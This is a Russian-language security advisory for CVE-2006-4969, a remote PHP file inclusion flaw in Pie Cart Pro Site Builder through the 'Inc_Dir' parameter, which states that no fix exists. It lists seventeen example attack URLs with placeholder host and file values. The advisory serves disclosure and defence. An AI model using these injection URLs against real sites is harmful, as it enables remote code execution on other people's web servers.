PHP-инклюдинг в системе управления содержанием Pie Cart Pro Site Builder

Дата публикации:	28.09.2006
Дата изменения:	17.10.2006
Всего просмотров:	4678
Опасность:	Высокая
Наличие исправления:	Нет
Количество уязвимостей:	1
CVE ID:	CVE-2006-4969
Вектор эксплуатации:	Удаленная
Воздействие:	Компрометация системы
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:	Pie Cart Pro Site Builder
	Уязвимые версии: Pie Cart Pro Site Builder Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "Inc_Dir" в различных сценариях. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример: http://[host]/affiliates.php?Inc_Dir=[file] http://[host]/orders.php?Inc_Dir=[file] http://[host]/events.php?Inc_Dir=[file] http://[host]/index.php?Inc_Dir=[file] http://[host]/articles.php?Inc_Dir=[file] http://[host]/faqs.php?Inc_Dir=[file] http://[host]/guestbook.php?Inc_Dir=[file] http://[host]/catalog.php?Inc_Dir=[file] http://[host]/wholesale.php?Inc_Dir=[file] http://[host]/weblinks.php?Inc_Dir=[file] http://[host]/certificates.php?Inc_Dir=[file] http://[host]/sitesearch.php?Inc_Dir=[file] http://[host]/contact.php?Inc_Dir=[file] http://[host]/sitemap.php?Inc_Dir=[file] http://[host]/search.php?Inc_Dir=[file] http://[host]/registry.php?Inc_Dir=[file] http://[host]/error.php?Inc_Dir=[file] URL производителя: www.wahm-ecommerce.com/catalog.php?item=1&catid=1&ret=catalog.php?category=1 Решение: Способов устранения уязвимости не существует в настоящее время.
Ссылки:	Pie Cart Pro (Inc_Dir) Remote File Include Vulnerabilities

PHP-инклюдинг в системе управления содержанием Pie Cart Pro Site Builder

Подпишитесь на email рассылку